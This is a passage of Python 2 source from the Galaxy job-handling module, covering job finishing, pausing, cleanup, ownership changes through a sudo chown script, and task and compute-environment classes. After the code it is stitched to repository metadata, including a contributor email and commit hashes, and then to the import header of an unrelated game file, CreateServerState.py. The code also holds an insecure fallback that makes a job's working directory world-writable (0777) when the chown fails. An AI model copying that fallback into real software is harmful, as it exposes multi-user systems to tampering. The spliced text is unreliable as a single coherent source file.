ActionBox.execute(self.app, self.sa_session, pja, job)
# If the job was deleted, call tool specific fail actions (used for e.g. external metadata) and clean up
if self.tool:
self.tool.job_failed( self, message, exception )
delete_files = self.app.config.cleanup_job == 'always' or (self.app.config.cleanup_job == 'onsuccess' and job.state == job.states.DELETED)
self.cleanup( delete_files=delete_files )
def pause( self, job=None, message=None ):
if job is None:
job = self.get_job()
if message is None:
message = "Execution of this dataset's job is paused"
if job.state == job.states.NEW:
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset_assoc.dataset.dataset.state = dataset_assoc.dataset.dataset.states.PAUSED
dataset_assoc.dataset.info = message
self.sa_session.add( dataset_assoc.dataset )
job.state = job.states.PAUSED
self.sa_session.add( job )
def mark_as_resubmitted( self ):
job = self.get_job()
self.sa_session.refresh( job )
# TODO: Enable this code once a UI for resubmitted datasets exists
#for dataset in [ dataset_assoc.dataset for dataset_assoc in job.output_datasets + job.output_library_datasets ]:
# dataset._state = model.Dataset.states.RESUBMITTED
# self.sa_session.add( dataset )
job.state = model.Job.states.RESUBMITTED
self.sa_session.add( job )
self.sa_session.flush()
def change_state( self, state, info=False ):
job = self.get_job()
self.sa_session.refresh( job )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = state
if info:
dataset.info = info
self.sa_session.add( dataset )
self.sa_session.flush()
if info:
job.info = info
job.state = state
self.sa_session.add( job )
self.sa_session.flush()
def get_state( self ):
job = self.get_job()
self.sa_session.refresh( job )
return job.state
def set_runner( self, runner_url, external_id ):
log.warning('set_runner() is deprecated, use set_job_destination()')
self.set_job_destination(self.job_destination, external_id)
def set_job_destination( self, job_destination, external_id=None ):
"""
Persist job destination params in the database for recovery.
self.job_destination is not used because a runner may choose to rewrite
parts of the destination (e.g. the params).
"""
job = self.get_job()
self.sa_session.refresh(job)
log.debug('(%s) Persisting job destination (destination id: %s)' % (job.id, job_destination.id))
job.destination_id = job_destination.id
job.destination_params = job_destination.params
job.job_runner_name = job_destination.runner
job.job_runner_external_id = external_id
self.sa_session.add(job)
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None, remote_working_directory=None ):
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# default post job setup
self.sa_session.expunge_all()
job = self.get_job()
# TODO: After failing here, consider returning from the function.
try:
self.reclaim_ownership()
except:
log.exception( '(%s) Failed to change ownership of %s, failing' % ( job.id, self.working_directory ) )
return self.fail( job.info, stdout=stdout, stderr=stderr, exit_code=tool_exit_code )
# if the job was deleted, don't finish it
if job.state == job.states.DELETED or job.state == job.states.ERROR:
# SM: Note that, at this point, the exit code must be saved in case
# there was an error. Errors caught here could mean that the job
# was deleted by an administrator (based on old comments), but it
# could also mean that a job was broken up into tasks and one of
# the tasks failed. So include the stderr, stdout, and exit code:
return self.fail( job.info, stderr=stderr, stdout=stdout, exit_code=tool_exit_code )
# Check the tool's stdout, stderr, and exit code for errors, but only
# if the job has not already been marked as having an error.
# The job's stdout and stderr will be set accordingly.
# We set final_job_state to use for dataset management, but *don't* set
# job.state until after dataset collection to prevent history issues
if ( self.check_tool_output( stdout, stderr, tool_exit_code, job ) ):
final_job_state = job.states.OK
else:
final_job_state = job.states.ERROR
if self.write_version_cmd:
version_filename = self.get_version_string_path()
if os.path.exists(version_filename):
self.version_string = open(version_filename).read()
os.unlink(version_filename)
if self.app.config.outputs_to_working_directory and not self.__link_file_check():
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "finish(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
except ( IOError, OSError ):
# this can happen if Galaxy is restarted during the job's
# finish method - the false_path file has already moved,
# and when the job is recovered, it won't be found.
if os.path.exists( dataset_path.real_path ) and os.stat( dataset_path.real_path ).st_size > 0:
log.warning( "finish(): %s not found, but %s is not empty, so it will be used instead" % ( dataset_path.false_path, dataset_path.real_path ) )
else:
# Prior to fail we need to set job.state
job.state = final_job_state
return self.fail( "Job %s's output dataset(s) could not be read" % job.id )
job_context = ExpressionContext( dict( stdout=job.stdout, stderr=job.stderr ) )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
context = self.get_dataset_finish_context( job_context, dataset_assoc.dataset.dataset )
#should this also be checking library associations? - can a library item be added from a history before the job has ended? - lets not allow this to occur
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations: # need to update all associated output hdas, i.e. history was shared with job running
trynum = 0
while trynum < self.app.config.retry_job_output_collection:
try:
# Attempt to short circuit NFS attribute caching
os.stat( dataset.dataset.file_name )
os.chown( dataset.dataset.file_name, os.getuid(), -1 )
trynum = self.app.config.retry_job_output_collection
except ( OSError, ObjectNotFound ), e:
trynum += 1
log.warning( 'Error accessing %s, will retry: %s', dataset.dataset.file_name, e )
time.sleep( 2 )
if getattr( dataset, "hidden_beneath_collection_instance", None ):
dataset.visible = False
dataset.blurb = 'done'
dataset.peek = 'no peek'
dataset.info = (dataset.info or '')
if context['stdout'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stdout'].strip()
if context['stderr'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stderr'].strip()
dataset.tool_version = self.version_string
dataset.set_size()
if 'uuid' in context:
dataset.dataset.uuid = context['uuid']
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
if job.states.ERROR == final_job_state:
dataset.blurb = "error"
dataset.mark_unhidden()
elif dataset.has_data():
# If the tool was expected to set the extension, attempt to retrieve it
if dataset.ext == 'auto':
dataset.extension = context.get( 'ext', 'data' )
dataset.init_meta( copy_from=dataset )
#if a dataset was copied, it won't appear in our dictionary:
#either use the metadata from originating output dataset, or call set_meta on the copies
#it would be quicker to just copy the metadata from the originating output dataset,
#but somewhat trickier (need to recurse up the copied_from tree), for now we'll call set_meta()
if ( not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and self.app.config.retry_metadata_internally ):
dataset.datatype.set_meta( dataset, overwrite=False ) # call datatype.set_meta directly for the initial set_meta call during dataset creation
elif not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and job.states.ERROR != final_job_state:
dataset._state = model.Dataset.states.FAILED_METADATA
else:
#load metadata from file
#we need to no longer allow metadata to be edited while the job is still running,
#since if it is edited, the metadata changed on the running output will no longer match
#the metadata that was stored to disk for use via the external process,
#and the changes made by the user will be lost, without warning or notice
output_filename = self.external_output_metadata.get_output_filenames_by_dataset( dataset, self.sa_session ).filename_out
def path_rewriter( path ):
if not remote_working_directory or not path:
return path
normalized_remote_working_directory = os.path.normpath( remote_working_directory )
normalized_path = os.path.normpath( path )
if normalized_path.startswith( normalized_remote_working_directory ):
return normalized_path.replace( normalized_remote_working_directory, self.working_directory, 1 )
return path
dataset.metadata.from_JSON_dict( output_filename, path_rewriter=path_rewriter )
try:
assert context.get( 'line_count', None ) is not None
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( line_count=context['line_count'], is_multi_byte=True )
else:
dataset.set_peek( line_count=context['line_count'] )
except:
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( is_multi_byte=True )
else:
dataset.set_peek()
try:
# set the name if provided by the tool
dataset.name = context['name']
except:
pass
else:
dataset.blurb = "empty"
if dataset.ext == 'auto':
dataset.extension = 'txt'
self.sa_session.add( dataset )
if job.states.ERROR == final_job_state:
log.debug( "setting dataset state to ERROR" )
# TODO: This is where the state is being set to error. Change it!
dataset_assoc.dataset.dataset.state = model.Dataset.states.ERROR
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset_assoc.dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
else:
dataset_assoc.dataset.dataset.state = model.Dataset.states.OK
# If any of the rest of the finish method below raises an
# exception, the fail method will run and set the datasets to
# ERROR. The user will never see that the datasets are in error if
# they were flushed as OK here, since upon doing so, the history
# panel stops checking for updates. So allow the
# self.sa_session.flush() at the bottom of this method set
# the state instead.
for pja in job.post_job_actions:
ActionBox.execute(self.app, self.sa_session, pja.post_job_action, job)
# Flush all the dataset and job changes above. Dataset state changes
# will now be seen by the user.
self.sa_session.flush()
# Save stdout and stderr
if len( job.stdout ) > DATABASE_MAX_STRING_SIZE:
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = util.shrink_string_by_size( job.stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( job.stderr ) > DATABASE_MAX_STRING_SIZE:
log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = util.shrink_string_by_size( job.stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
# The exit code will be null if there is no exit code to be set.
# This is so that we don't assign an exit code, such as 0, that
# is either incorrect or has the wrong semantics.
if None != tool_exit_code:
job.exit_code = tool_exit_code
# custom post process setup
inp_data = dict( [ ( da.name, da.dataset ) for da in job.input_datasets ] )
out_data = dict( [ ( da.name, da.dataset ) for da in job.output_datasets ] )
inp_data.update( [ ( da.name, da.dataset ) for da in job.input_library_datasets ] )
out_data.update( [ ( da.name, da.dataset ) for da in job.output_library_datasets ] )
input_ext = 'data'
for _, data in inp_data.items():
# For loop odd, but sort simulating behavior in galaxy.tools.actions
if not data:
continue
input_ext = data.ext
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] ) # why not re-use self.param_dict here? ##dunno...probably should, this causes tools.parameters.basic.UnvalidatedValue to be used in following methods instead of validated and transformed values during i.e. running workflows
param_dict = self.tool.params_from_strings( param_dict, self.app )
# Check for and move associated_files
self.tool.collect_associated_files(out_data, self.working_directory)
# Create generated output children and primary datasets and add to param_dict
collected_datasets = {
'children': self.tool.collect_child_datasets(out_data, self.working_directory),
'primary': self.tool.collect_primary_datasets(out_data, self.working_directory, input_ext)
}
param_dict.update({'__collected_datasets__': collected_datasets})
# Certain tools require tasks to be completed after job execution
# ( this used to be performed in the "exec_after_process" hook, but hooks are deprecated ).
self.tool.exec_after_process( self.queue.app, inp_data, out_data, param_dict, job=job )
# Call 'exec_after_process' hook
self.tool.call_hook( 'exec_after_process', self.queue.app, inp_data=inp_data,
out_data=out_data, param_dict=param_dict,
tool=self.tool, stdout=job.stdout, stderr=job.stderr )
job.command_line = self.command_line
bytes = 0
# Once datasets are collected, set the total dataset size (includes extra files)
for dataset_assoc in job.output_datasets:
dataset_assoc.dataset.dataset.set_total_size()
bytes += dataset_assoc.dataset.dataset.get_total_size()
if job.user:
job.user.total_disk_usage += bytes
# fix permissions
for path in [ dp.real_path for dp in self.get_mutable_output_fnames() ]:
util.umask_fix_perms( path, self.app.config.umask, 0666, self.app.config.gid )
# Finally set the job state. This should only happen *after* all
# dataset creation, and will allow us to eliminate force_history_refresh.
job.state = final_job_state
if not job.tasks:
# If job was composed of tasks, don't attempt to recollect statisitcs
self._collect_metrics( job )
self.sa_session.flush()
log.debug( 'job %d ended' % self.job_id )
delete_files = self.app.config.cleanup_job == 'always' or ( job.state == job.states.OK and self.app.config.cleanup_job == 'onsuccess' )
self.cleanup( delete_files=delete_files )
def check_tool_output( self, stdout, stderr, tool_exit_code, job ):
return check_output( self.tool, stdout, stderr, tool_exit_code, job )
def cleanup( self, delete_files=True ):
# At least one of these tool cleanup actions (job import), is needed
# for thetool to work properly, that is why one might want to run
# cleanup but not delete files.
try:
if delete_files:
for fname in self.extra_filenames:
os.remove( fname )
self.external_output_metadata.cleanup_external_metadata( self.sa_session )
galaxy.tools.imp_exp.JobExportHistoryArchiveWrapper( self.job_id ).cleanup_after_job( self.sa_session )
galaxy.tools.imp_exp.JobImportHistoryArchiveWrapper( self.app, self.job_id ).cleanup_after_job()
if delete_files:
self.app.object_store.delete(self.get_job(), base_dir='job_work', entire_dir=True, dir_only=True, extra_dir=str(self.job_id))
except:
log.exception( "Unable to cleanup job %d" % self.job_id )
def _collect_metrics( self, has_metrics ):
job = has_metrics.get_job()
per_plugin_properties = self.app.job_metrics.collect_properties( job.destination_id, self.job_id, self.working_directory )
if per_plugin_properties:
log.info( "Collecting job metrics for %s" % has_metrics )
for plugin, properties in per_plugin_properties.iteritems():
for metric_name, metric_value in properties.iteritems():
if metric_value is not None:
has_metrics.add_metric( plugin, metric_name, metric_value )
def get_output_sizes( self ):
sizes = []
output_paths = self.get_output_fnames()
for outfile in [ str( o ) for o in output_paths ]:
if os.path.exists( outfile ):
sizes.append( ( outfile, os.stat( outfile ).st_size ) )
else:
sizes.append( ( outfile, 0 ) )
return sizes
def check_limits(self, runtime=None):
if self.app.job_config.limits.output_size > 0:
for outfile, size in self.get_output_sizes():
if size > self.app.job_config.limits.output_size:
log.warning( '(%s) Job output size %s has exceeded the global output size limit', self.get_id_tag(), os.path.basename( outfile ) )
return JobState.runner_states.OUTPUT_SIZE_LIMIT, 'Job output file grew too large (greater than %s), please try different inputs or parameters' % util.nice_size( self.app.job_config.limits.output_size )
if self.app.job_config.limits.walltime_delta is not None and runtime is not None:
if runtime > self.app.job_config.limits.walltime_delta:
log.warning( '(%s) Job runtime %s has exceeded the global walltime, it will be terminated', self.get_id_tag(), runtime )
return JobState.runner_states.GLOBAL_WALLTIME_REACHED, 'Job ran longer than the maximum allowed execution time (runtime: %s, limit: %s), please try different inputs or parameters' % ( str(runtime).split('.')[0], self.app.job_config.limits.walltime )
return None
def has_limits( self ):
has_output_limit = self.app.job_config.limits.output_size > 0
has_walltime_limit = self.app.job_config.limits.walltime_delta is not None
return has_output_limit or has_walltime_limit
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_env_setup_clause( self ):
if self.app.config.environment_setup_file is None:
return ''
return '[ -f "%s" ] && . %s' % ( self.app.config.environment_setup_file, self.app.config.environment_setup_file )
def get_input_dataset_fnames( self, ds ):
filenames = []
filenames = [ ds.file_name ]
#we will need to stage in metadata file names also
#TODO: would be better to only stage in metadata files that are actually needed (found in command line, referenced in config files, etc.)
for key, value in ds.metadata.items():
if isinstance( value, model.MetadataFile ):
filenames.append( value.file_name )
return filenames
def get_input_fnames( self ):
job = self.get_job()
filenames = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames.extend(self.get_input_dataset_fnames(da.dataset))
return filenames
def get_input_paths( self, job=None ):
if job is None:
job = self.get_job()
paths = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames = self.get_input_dataset_fnames(da.dataset)
for real_path in filenames:
false_path = self.dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'input' )
paths.append( DatasetPath( da.id, real_path=real_path, false_path=false_path, mutable=False ) )
return paths
def get_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return self.output_paths
def get_mutable_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return filter( lambda dsp: dsp.mutable, self.output_paths )
def get_output_hdas_and_fnames( self ):
if self.output_hdas_and_paths is None:
self.compute_outputs()
return self.output_hdas_and_paths
def compute_outputs( self ) :
dataset_path_rewriter = self.dataset_path_rewriter
job = self.get_job()
# Job output datasets are combination of history, library, and jeha datasets.
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
false_path = None
results = []
for da in job.output_datasets + job.output_library_datasets:
da_false_path = dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'output' )
mutable = da.dataset.dataset.external_filename is None
dataset_path = DatasetPath( da.dataset.dataset.id, da.dataset.file_name, false_path=da_false_path, mutable=mutable )
results.append( ( da.name, da.dataset, dataset_path ) )
self.output_paths = [t[2] for t in results]
self.output_hdas_and_paths = dict([(t[0], t[1:]) for t in results])
if special:
false_path = dataset_path_rewriter.rewrite_dataset_path( special.dataset, 'output' )
dsp = DatasetPath( special.dataset.id, special.dataset.file_name, false_path )
self.output_paths.append( dsp )
return self.output_paths
def get_output_file_id( self, file ):
if self.output_paths is None:
self.get_output_fnames()
for dp in self.output_paths:
if self.app.config.outputs_to_working_directory and os.path.basename( dp.false_path ) == file:
return dp.dataset_id
elif os.path.basename( dp.real_path ) == file:
return dp.dataset_id
return None
def get_tool_provided_job_metadata( self ):
if self.tool_provided_job_metadata is not None:
return self.tool_provided_job_metadata
# Look for JSONified job metadata
self.tool_provided_job_metadata = []
meta_file = os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE )
if os.path.exists( meta_file ):
for line in open( meta_file, 'r' ):
try:
line = from_json_string( line )
assert 'type' in line
except:
log.exception( '(%s) Got JSON data from tool, but data is improperly formatted or no "type" key in data' % self.job_id )
log.debug( 'Offending data was: %s' % line )
continue
# Set the dataset id if it's a dataset entry and isn't set.
# This isn't insecure. We loop the job's output datasets in
# the finish method, so if a tool writes out metadata for a
# dataset id that it doesn't own, it'll just be ignored.
if line['type'] == 'dataset' and 'dataset_id' not in line:
try:
line['dataset_id'] = self.get_output_file_id( line['dataset'] )
except KeyError:
log.warning( '(%s) Tool provided job dataset-specific metadata without specifying a dataset' % self.job_id )
continue
self.tool_provided_job_metadata.append( line )
return self.tool_provided_job_metadata
def get_dataset_finish_context( self, job_context, dataset ):
for meta in self.get_tool_provided_job_metadata():
if meta['type'] == 'dataset' and meta['dataset_id'] == dataset.id:
return ExpressionContext( meta, job_context )
return job_context
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# extension could still be 'auto' if this is the upload tool.
job = self.get_job()
if set_extension:
for output_dataset_assoc in job.output_datasets:
if output_dataset_assoc.dataset.ext == 'auto':
context = self.get_dataset_finish_context( dict(), output_dataset_assoc.dataset.dataset )
output_dataset_assoc.dataset.extension = context.get( 'ext', 'data' )
self.sa_session.flush()
if tmp_dir is None:
#this dir should should relative to the exec_dir
tmp_dir = self.app.config.new_file_path
if dataset_files_path is None:
dataset_files_path = self.app.model.Dataset.file_path
if config_root is None:
config_root = self.app.config.root
if config_file is None:
config_file = self.app.config.config_file
if datatypes_config is None:
datatypes_config = self.app.datatypes_registry.integrated_datatypes_configs
return self.external_output_metadata.setup_external_metadata( [ output_dataset_assoc.dataset for output_dataset_assoc in job.output_datasets + job.output_library_datasets ],
self.sa_session,
exec_dir=exec_dir,
tmp_dir=tmp_dir,
dataset_files_path=dataset_files_path,
config_root=config_root,
config_file=config_file,
datatypes_config=datatypes_config,
job_metadata=os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE ),
**kwds )
@property
def user( self ):
job = self.get_job()
if job.user is not None:
return job.user.email
elif job.galaxy_session is not None and job.galaxy_session.user is not None:
return job.galaxy_session.user.email
elif job.history is not None and job.history.user is not None:
return job.history.user.email
elif job.galaxy_session is not None:
return 'anonymous@' + job.galaxy_session.remote_addr.split()[-1]
else:
return 'anonymous@unknown'
def __link_file_check( self ):
""" outputs_to_working_directory breaks library uploads where data is
linked. This method is a hack that solves that problem, but is
specific to the upload tool and relies on an injected job param. This
method should be removed ASAP and replaced with some properly generic
and stateful way of determining link-only datasets. -nate
"""
job = self.get_job()
param_dict = job.get_param_values( self.app )
return self.tool.id == 'upload1' and param_dict.get( 'link_data_only', None ) == 'link_to_files'
def _change_ownership( self, username, gid ):
job = self.get_job()
# FIXME: hardcoded path
cmd = [ '/usr/bin/sudo', '-E', self.app.config.external_chown_script, self.working_directory, username, str( gid ) ]
log.debug( '(%s) Changing ownership of working directory with: %s' % ( job.id, ' '.join( cmd ) ) )
p = subprocess.Popen( cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE )
# TODO: log stdout/stderr
stdout, stderr = p.communicate()
assert p.returncode == 0
def change_ownership_for_run( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
try:
self._change_ownership( self.user_system_pwent[0], str( self.user_system_pwent[3] ) )
except:
log.exception( '(%s) Failed to change ownership of %s, making world-writable instead' % ( job.id, self.working_directory ) )
os.chmod( self.working_directory, 0777 )
def reclaim_ownership( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
self._change_ownership( self.galaxy_system_pwent[0], str( self.galaxy_system_pwent[3] ) )
@property
def user_system_pwent( self ):
if self.__user_system_pwent is None:
job = self.get_job()
try:
self.__user_system_pwent = pwd.getpwnam( job.user.email.split('@')[0] )
except:
pass
return self.__user_system_pwent
@property
def galaxy_system_pwent( self ):
if self.__galaxy_system_pwent is None:
self.__galaxy_system_pwent = pwd.getpwuid(os.getuid())
return self.__galaxy_system_pwent
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. This is the normal case,
just copy these files directly to the ulimate destination.
"""
return output_path
@property
def requires_setting_metadata( self ):
if self.tool:
return self.tool.requires_setting_metadata
return False
class TaskWrapper(JobWrapper):
"""
Extension of JobWrapper intended for running tasks.
Should be refactored into a generalized executable unit wrapper parent, then jobs and tasks.
"""
# Abstract this to be more useful for running tasks that *don't* necessarily compose a job.
def __init__(self, task, queue):
super(TaskWrapper, self).__init__(task.job, queue)
self.task_id = task.id
working_directory = task.working_directory
self.working_directory = working_directory
job_dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.dataset_path_rewriter = TaskPathRewriter( working_directory, job_dataset_path_rewriter )
if task.prepare_input_files_cmd is not None:
self.prepare_input_files_cmds = [ task.prepare_input_files_cmd ]
else:
self.prepare_input_files_cmds = None
self.status = task.states.NEW
def can_split( self ):
# Should the job handler split this job up? TaskWrapper should
# always return False as the job has already been split.
return False
def get_job( self ):
if self.job_id:
return self.sa_session.query( model.Job ).get( self.job_id )
else:
return None
def get_task( self ):
return self.sa_session.query(model.Task).get(self.task_id)
def get_id_tag(self):
# For compatibility with drmaa job runner and TaskWrapper, instead of using job_id directly
return self.get_task().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.sa_session.query( model.Job ).get( self.job_id )
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
# Restore parameters from the database
job = self._load_job()
task = self.get_task()
# DBTODO New method for generating command line for a task?
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
if self.command_line and self.command_line.startswith( 'python' ):
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
task.command_line = self.command_line
self.sa_session.add( task )
self.sa_session.flush()
self.param_dict = tool_evaluator.param_dict
self.status = 'prepared'
return self.extra_filenames
def fail( self, message, exception=False ):
log.error("TaskWrapper Failure %s" % message)
self.status = 'error'
# How do we want to handle task failure? Fail the job and let it clean up?
def change_state( self, state, info=False ):
task = self.get_task()
self.sa_session.refresh( task )
if info:
task.info = info
task.state = state
self.sa_session.add( task )
self.sa_session.flush()
def get_state( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.state
def get_exit_code( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.exit_code
def set_runner( self, runner_url, external_id ):
task = self.get_task()
self.sa_session.refresh( task )
task.task_runner_name = runner_url
task.task_runner_external_id = external_id
# DBTODO Check task job_runner_stuff
self.sa_session.add( task )
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None ):
# DBTODO integrate previous finish logic.
# Simple finish for tasks. Just set the flag OK.
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# This may have ended too soon
log.debug( 'task %s for job %d ended; exit code: %d'
% (self.task_id, self.job_id,
tool_exit_code if tool_exit_code != None else -256 ) )
# default post job setup_external_metadata
self.sa_session.expunge_all()
task = self.get_task()
# if the job was deleted, don't finish it
if task.state == task.states.DELETED:
# Job was deleted by an administrator
delete_files = self.app.config.cleanup_job in ( 'always', 'onsuccess' )
self.cleanup( delete_files=delete_files )
return
elif task.state == task.states.ERROR:
self.fail( task.info )
return
# Check what the tool returned. If the stdout or stderr matched
# regular expressions that indicate errors, then set an error.
# The same goes if the tool's exit code was in a given range.
if ( self.check_tool_output( stdout, stderr, tool_exit_code, task ) ):
task.state = task.states.OK
else:
task.state = task.states.ERROR
# Save stdout and stderr
if len( stdout ) > DATABASE_MAX_STRING_SIZE:
log.error( "stdout for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
task.stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( stderr ) > DATABASE_MAX_STRING_SIZE:
log.error( "stderr for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
self._collect_metrics( task )
task.stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
task.exit_code = tool_exit_code
task.command_line = self.command_line
self.sa_session.flush()
def cleanup( self ):
# There is no task cleanup. The job cleans up for all tasks.
pass
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_output_file_id( self, file ):
# There is no permanent output file for tasks.
return None
def get_tool_provided_job_metadata( self ):
# DBTODO Handle this as applicable for tasks.
return None
def get_dataset_finish_context( self, job_context, dataset ):
# Handled at the parent job level. Do nothing here.
pass
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# There is no metadata setting for tasks. This is handled after the merge, at the job level.
return ""
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. These must be copied with
the same basenme as the path for the ultimate output destination. This is
required in the task case so they can be merged.
"""
return os.path.join( self.working_directory, os.path.basename( output_path ) )
class ComputeEnvironment( object ):
""" Definition of the job as it will be run on the (potentially) remote
compute server.
"""
__metaclass__ = ABCMeta
@abstractmethod
def output_paths( self ):
""" Output DatasetPaths defined by job. """
@abstractmethod
def input_paths( self ):
""" Input DatasetPaths defined by job. """
@abstractmethod
def working_directory( self ):
""" Job working directory (potentially remote) """
@abstractmethod
def config_directory( self ):
""" Directory containing config files (potentially remote) """
@abstractmethod
def sep( self ):
""" os.path.sep for the platform this job will execute in.
"""
@abstractmethod
def new_file_path( self ):
""" Location to dump new files for this job on remote server. """
@abstractmethod
def version_path( self ):
""" Location of the version file for the underlying tool. """
@abstractmethod
def unstructured_path_rewriter( self ):
""" Return a function that takes in a value, determines if it is path
to be rewritten (will be passed non-path values as well - onus is on
this function to determine both if its input is a path and if it should
be rewritten.)
"""
class SimpleComputeEnvironment( object ):
def config_directory( self ):
return self.working_directory( )
def sep( self ):
return os.path.sep
def unstructured_path_rewriter( self ):
return lambda v: v
class SharedComputeEnvironment( SimpleComputeEnvironment ):
""" Default ComputeEnviornment for job and task wrapper to pass
to ToolEvaluator - valid when Galaxy and compute share all the relevant
file systems.
"""
def __init__( self, job_wrapper, job ):
self.app = job_wrapper.app
self.job_wrapper = job_wrapper
self.job = job
def output_paths( self ):
return self.job_wrapper.get_output_fnames()
def input_paths( self ):
return self.job_wrapper.get_input_paths( self.job )
def working_directory( self ):
return self.job_wrapper.working_directory
def new_file_path( self ):
return os.path.abspath( self.app.config.new_file_path )
def version_path( self ):
return self.job_wrapper.get_version_string_path()
class NoopQueue( object ):
"""
Implements the JobQueue / JobStopQueue interface but does nothing
"""
def put( self, *args, **kwargs ):
return
def put_stop( self, *args ):
return
def shutdown( self ):
return
class ParallelismInfo(object):
"""
Stores the information (if any) for running multiple instances of the tool in parallel
on the same set of inputs.
"""
def __init__(self, tag):
self.method = tag.get('method')
if isinstance(tag, dict):
items = tag.iteritems()
else:
items = tag.attrib.items()
self.attributes = dict( [ item for item in items if item[ 0 ] != 'method' ])
if len(self.attributes) == 0:
# legacy basic mode - provide compatible defaults
self.attributes['split_size'] = 20
self.attributes['split_mode'] = 'number_of_parts'
|
[
"sokratiskariotis@gmail.com"
] |
sokratiskariotis@gmail.com
|
8fa6fd693effe0a2e6b5bc5ceffffc3a0bc356d1
|
fc913f9b19c5409e5cef4d0276863d4229d0637c
|
/states/CreateServerState.py
|
8ef507d86920bbc4298e5b8e907249f8abb2972b
|
[] |
no_license
|
ThatsAMorais/breakin-and-poppin
|
6af7e53395f45e47aa0e3c36a5868eca962b2aa0
|
dd6c4e39e9e5af7109c26b51c24607099c3a3b98
|
refs/heads/master
| 2021-01-06T20:37:18.303481
| 2018-08-20T06:36:49
| 2018-08-20T06:36:49
| 7,364,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,984
|
py
|
##### File : CreateServerState.py
#### Author : Alex Morais
### Description :
##
from states.EngineState import *
from states.TitleScreenState import *
from states.ChoosePlayerState import *
from ui.Font import *
from ui.UIText import *
from ui.UIImage import *
